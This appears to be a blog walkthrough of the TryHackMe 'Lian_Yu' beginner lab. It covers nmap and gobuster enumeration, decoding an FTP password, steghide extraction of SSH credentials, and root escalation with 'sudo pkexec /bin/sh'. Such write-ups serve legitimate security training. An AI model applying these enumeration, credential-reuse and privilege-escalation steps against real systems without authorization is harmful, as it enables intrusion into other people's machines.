Cyber Security Writeups

Lian_Yu TryHackMe Walkthrough writeup

Introduction

Hey, folks with you volk in this writeup we are going to solve and explain Lian Yu Challenge on TryHackMe.

The difficulty of challenge is a beginner-level challenge.

Tools Used

Enumeration

First, I Scanned the target using Nmap to know the open ports, OS, Version, etc… by the following command:

nmap -A [Machine_IP]

-A: OS detection, Script Scanning, Version detection, and traceroute

PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.2
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
|   2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
|   256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_  256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp  open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35098/udp   status
|   100024  1          55094/tcp   status
|   100024  1          58104/tcp6  status
|_  100024  1          59600/udp6  status
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

I tried to access the FTP port using the username and password of anonymous but it didn’t allow me, So I

decided to check port 80 (HTTP)

The Website

nothing important even in the source code so let’s try to brute force the hidden directories using Gobuster by

typing :

gobuster dir -u http://10.10.166.42 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

dir: use directory brute force

-u: to specify the target URL

-w: to specify the path of the wordlist you wanna use 

that’s the result:

===============================================================
[+] Url:                     http://10.10.166.42
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
/island               (Status: 301) [Size: 235] [--> http://10.10.166.42/island/]

So I found a directory called island 

then I checked the source code

<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</h2>

As you can see at the end of the code the word vigilante is some kind of hidden, we will use this word later but

lets now try to gobuster island directory 

gobuster dir -u http://10.10.166.42/island -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

===============================================================
[+] Url:                     http://10.10.166.42/island
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
/2100                 (Status: 301) [Size: 240] [--> http://10.10.166.42/island/2100/]

I found this directory /2100 and by founding this directory we solved the first question  

I went to http://[Machine_IP]/island/2100 

Nothing intersting so i decided to check the source code

<!DOCTYPE html>
<html>
<body>

<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>


<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how?   -->

</header>
</body>
</html>

There is a comment in the source code that is giving us a hint that there is a filename and its extension is .ticket

so let’s try to gobuster name of the file and its extension .ticket, so I will use -x to brute force directory /2100

and at the end of the file, the extension will be .ticket.

gobuster dir -u http://10.10.166.42/island -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .ticket

===============================================================
[+] Url:                     http://10.10.132.83/island/2100/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              ticket
[+] Timeout:                 10s
===============================================================
/green_arrow.ticket   (Status: 200) [Size: 71]

We got the file name and by founding this file we answered the second question

When I accessed the file I found the encoded password

RTy8yhBQdscX

So I tried to use many tools to analyze the has until I found Good Website which is tunnels up

and I knew that it is base64 but when I went to Cyberchef and tried to decode it from base64 I got nothing

so I tried all the types of bases until I got the password by decoding it with base58 

Gaining Access

Now Lets access FTP by the username that was hidden (Vigilante) and the decoded password

Connected to 10.10.124.174.
220 (vsFTPd 3.0.2)
Name (10.10.124.174:kali): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Login Successful, now let’s list the files and download it

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 May 05  2020 .
drwxr-xr-x    4 0        0            4096 May 01  2020 ..
-rw-------    1 1001     1001           44 May 01  2020 .bash_history
-rw-r--r--    1 1001     1001          220 May 01  2020 .bash_logout
-rw-r--r--    1 1001     1001         3515 May 01  2020 .bashrc
-rw-r--r--    1 0        0            2483 May 01  2020 .other_user
-rw-r--r--    1 1001     1001          675 May 01  2020 .profile
-rw-r--r--    1 0        0          511720 May 01  2020 Leave_me_alone.png
-rw-r--r--    1 0        0          549924 May 05  2020 Queen's_Gambit.png
-rw-r--r--    1 0        0          191026 May 01  2020 aa.jpg
226 Directory send OK.

ftp> get .other_user

ftp> get Queen's_Gambit.png

ftp> get aa.jpg

ftp> get Leave_me_alone.png

We downloaded all the intersting files successfull, now lets try to move the directory back one directory

ftp> cd ..
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    4 0        0            4096 May 01  2020 .
drwxr-xr-x   23 0        0            4096 Apr 30  2020 ..
drwx------    2 1000     1000         4096 May 01  2020 slade
drwxr-xr-x    2 1001     1001         4096 May 05  2020 vigilante
226 Directory send OK.

Analyzing the Files

As you can see we got another username and this information can be used later, For now, let’s analyze the files

we found when I read the .other_user file I didn’t find anything helpful but the username Slade. and I tried to use

ExifTool with the images but I didn’t get any useful information, If we tried to open the Leave_me_alone.png file

we will get an error and the reason of this error is the wrong signature of the file

List of file signatures

Let’s Edit the header of the image using hexeditor

As you can see it doesnt match the png signature that on Wikipedia so lets make it the same

After Editing it the image opened 🙂

Its giving us a hint that the password is the password so let’s try to Seghide the files and try this password
 

$ steghide extract -sf aa.jpg 
Enter passphrase: password
wrote extracted data to "ss.zip".
$ unzip ss.zip                      
Archive:  ss.zip
  inflating: passwd.txt              
  inflating: shado      

Nice, It worked!, We got two files lets see what is inside

$ cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and 
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.

$ cat shado          
M3tahuman

Nothing interesting in passwd.txt but looks like we got the password of the ssh from Shado file, Lets Connect to

SSH.

$ ssh slade@10.10.120.240
slade@10.10.120.240's password: M3tahuman
			      Way To SSH...
			  Loading.........Done.. 
		   Connecting To Lian_Yu  Happy Hacking

██╗    ██╗███████╗██╗      ██████╗ ██████╗ ███╗   ███╗███████╗██████╗ 
██║    ██║██╔════╝██║     ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗
██║ █╗ ██║█████╗  ██║     ██║     ██║   ██║██╔████╔██║█████╗   █████╔╝
██║███╗██║██╔══╝  ██║     ██║     ██║   ██║██║╚██╔╝██║██╔══╝  ██╔═══╝ 
╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗
 ╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚══════╝


	██╗     ██╗ █████╗ ███╗   ██╗     ██╗   ██╗██╗   ██╗
	██║     ██║██╔══██╗████╗  ██║     ╚██╗ ██╔╝██║   ██║
	██║     ██║███████║██╔██╗ ██║      ╚████╔╝ ██║   ██║
	██║     ██║██╔══██║██║╚██╗██║       ╚██╔╝  ██║   ██║
	███████╗██║██║  ██║██║ ╚████║███████╗██║   ╚██████╔╝
	╚══════╝╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚═╝    ╚═════╝  #

slade@LianYu:~$ cat user.txt
THM{Root_Flag}

We got the user flag 🙂

Privilege Escalation

lets try sudo -l to see the command that can be executed by this user (slade) as root

slade@LianYu:~$ sudo -l
[sudo] password for slade: 
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec

Nice, We can run Pkexec with root privileges now let’s go to GTFOBins  and search for pkexec

sudo pkexec /bin/sh

Lets execute the above command to escalates to root privileges

slade@LianYu:~$ sudo pkexec /bin/sh
# ls
root.txt
# cat root.txt
                          Mission accomplished



You are injected me with Mirakuru:) ---> Now slade Will become DEATHSTROKE. 



THM{Root_Flag}
									      --DEATHSTROKE

And we got the Root flag :), Thanks For reading the writeup see you in the next writeup

Volk_407
My name is Moustafa I am a Penetration tester 💻 | Bug Hunter 🐛 | Video Editor 🎥 Acknowledgements: Marvel/TWDC | Pinterest | Picsart | Vanilla Certifications: eJPT | eWPTX | eMAPT | ICCA | CAP